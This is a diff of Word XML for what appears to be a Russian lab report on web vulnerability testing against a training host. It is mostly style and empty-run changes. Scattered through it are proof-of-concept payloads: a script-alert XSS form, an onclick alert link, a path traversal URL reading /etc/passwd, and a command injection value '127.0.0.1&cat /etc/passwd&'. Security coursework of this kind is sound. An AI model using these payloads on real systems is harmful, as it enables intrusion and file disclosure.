             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -20278,10 +20301,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -20320,13 +20350,12 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20342,12 +20371,34 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve">Пример формы с внедрением XSS:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">html</w:t>
       </w:r>
       <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -20356,13 +20407,13 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">html</w:t>
+        <w:t xml:space="preserve">&lt;form action="/submit" method="post"&gt;</w:t>
       </w:r>
       <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -20371,62 +20422,46 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;form action="/submit" method="post"&gt;</w:t>
+        <w:t xml:space="preserve">    &lt;script&gt;alert('Cross Site Scripting (DOM Based) 2')&lt;/script&gt;"&gt;</w:t>
       </w:r>
       <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    &lt;script&gt;alert('Cross Site Scripting (DOM Based) 2')&lt;/script&gt;"&gt;</w:t>
-      </w:r>
-      <w:r/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
-        <w:ind w:left="0" w:right="0" w:firstLine="709"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
-      </w:r>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20512,10 +20547,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20523,6 +20565,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20540,7 +20589,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20570,13 +20619,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20588,7 +20630,7 @@
       <w:hyperlink r:id="rId74" w:tooltip="http://92.51.39.106:8060/" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -20597,7 +20639,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -20612,7 +20654,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20630,7 +20671,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -20685,10 +20726,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -20703,7 +20751,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -20718,7 +20766,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -20733,7 +20781,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -20748,7 +20796,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -20763,7 +20811,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -20778,7 +20826,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20794,7 +20842,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Выведет ссылку, при нажатии на которую запуститься скрипт - окно предупреждение</w:t>
       </w:r>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20812,7 +20859,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20898,10 +20945,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20909,6 +20963,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20926,7 +20987,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20967,7 +21028,7 @@
       <w:hyperlink r:id="rId76" w:tooltip="http://92.51.39.106:8060/" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -20976,7 +21037,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -21001,7 +21062,7 @@
       <w:hyperlink r:id="rId77" w:tooltip="http://92.51.39.106:7799/" w:history="1">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -21010,7 +21071,7 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="931"/>
+            <w:rStyle w:val="941"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:sz w:val="28"/>
             <w:szCs w:val="28"/>
@@ -21032,10 +21093,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -21051,7 +21119,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -21067,7 +21135,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -21084,7 +21152,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Этот HTML-код создаст ссылку "Перейти на сайт", которая, когда будет щелкнута, вызовет всплывающее окно с вредоносным сообщением.</w:t>
       </w:r>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21102,7 +21169,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21188,10 +21255,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21199,6 +21273,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21216,7 +21297,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
       </w:pPr>
       <w:r>
@@ -21230,7 +21311,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21247,11 +21328,18 @@
         </w:rPr>
         <w:t xml:space="preserve">&lt;a href="http://92.51.39.106:7799/" onclick="alert('Это вредоносное сообщение!'); return false;"&gt;Перейти на сайт&lt;/a&gt; - </w:t>
       </w:r>
-      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21267,7 +21355,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Этот HTML-код создаст ссылку "Перейти на сайт", которая, когда будет щелкнута, вызовет всплывающее окно с вредоносным сообщением.</w:t>
       </w:r>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21285,7 +21372,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21373,16 +21460,30 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21400,13 +21501,20 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="956"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21424,7 +21532,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21470,12 +21578,13 @@
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -21512,12 +21621,13 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -21534,7 +21644,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -21552,27 +21662,25 @@
         </w:rPr>
         <w:t xml:space="preserve">http://92.51.39.106:7799/read?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd</w:t>
       </w:r>
-      <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:highlight w:val="none"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21675,7 +21783,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21683,6 +21791,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21700,7 +21815,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21750,7 +21865,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -21790,10 +21905,18 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -21810,7 +21933,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -21829,7 +21952,6 @@
         </w:rPr>
         <w:t xml:space="preserve">127.0.0.1&amp;cat /etc/passwd&amp;</w:t>
       </w:r>
-      <w:r/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21849,7 +21971,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -21938,10 +22060,17 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21949,6 +22078,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -21966,7 +22102,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="886"/>
+        <w:pStyle w:val="896"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="4"/>
@@ -22009,7 +22145,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="946"/>
+        <w:pStyle w:val="956"/>
         <w:ind w:left="0" w:right="0" w:firstLine="709"/>
         <w:rPr>
